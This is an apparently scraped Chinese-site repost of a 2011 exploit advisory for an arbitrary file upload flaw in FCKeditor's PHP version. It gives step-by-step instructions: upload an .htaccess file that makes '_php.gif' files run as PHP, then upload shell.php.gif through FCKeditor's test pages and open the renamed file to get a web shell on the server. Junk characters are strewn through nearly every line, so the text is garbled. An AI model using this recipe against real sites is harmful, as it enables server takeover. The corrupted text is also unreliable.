FCKeditor所有php版本Upload上传漏洞
. R/ U/ N. T* g作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
; D) ], d: t# E! Q减小字体 增大字体
7 B' ^( k/ O& J9 \5 H[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability( \5 l, [8 B0 X! m
[+] Date: 20119 U: a% ~( a! t* I
[+] Author : sinesafe.cn2 Q2 j/ n: B7 ` g2 i g$ W% g
[+] Website : WwW.sinesafe.cn' {& \8 r4 @( a6 ?6 f5 P
———————————————————
2 y9 g @ D% p& _, V' r' k1.create a htaccess file:
( ^) u! R. z. z+ @) A1 U( C' \code:5 g: W$ k4 T) W
<FilesMatch “_php.gif”>
% e+ X- V* p X& fSetHandler application/x-httpd-php2 {% C( s% K9 d% Y1 U5 L3 r3 {% }
</FilesMatch>
$ j# p. y/ r' U! {: y: D* k
, M" f% ^2 ?9 |2.Now upload this htaccess with FCKeditor.3 ]* @( \# e7 u1 d
6 ~$ s0 E& p/ L- q0 c8 zhttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html; d! \% @6 K% H! l+ I0 D' R* {
8 L7 \; P* O8 L+ v: ~
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
1 K7 R X% ~+ k# R4 B2 N9 B
- z0 v% v/ U- _3 `9 V: _———————————————————————————————-9 X `6 |# _' J1 r
3.Now upload shell.php.gif with FCKeditor.2 `9 M4 m$ d* ]6 B* V
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
1 b: |( Q8 z$ c& Y) L5.http://www.sinesafe.cn/anything/shell_php.gif! g0 R+ v/ Y/ m
6.Now shell is available from server. |
K" i5 ~4 l2 a G0 V: j/ I; M1 q* T$ c8 r& B) c# Z
8 r" ~" ^9 U2 z5 X+ q9 E) u
|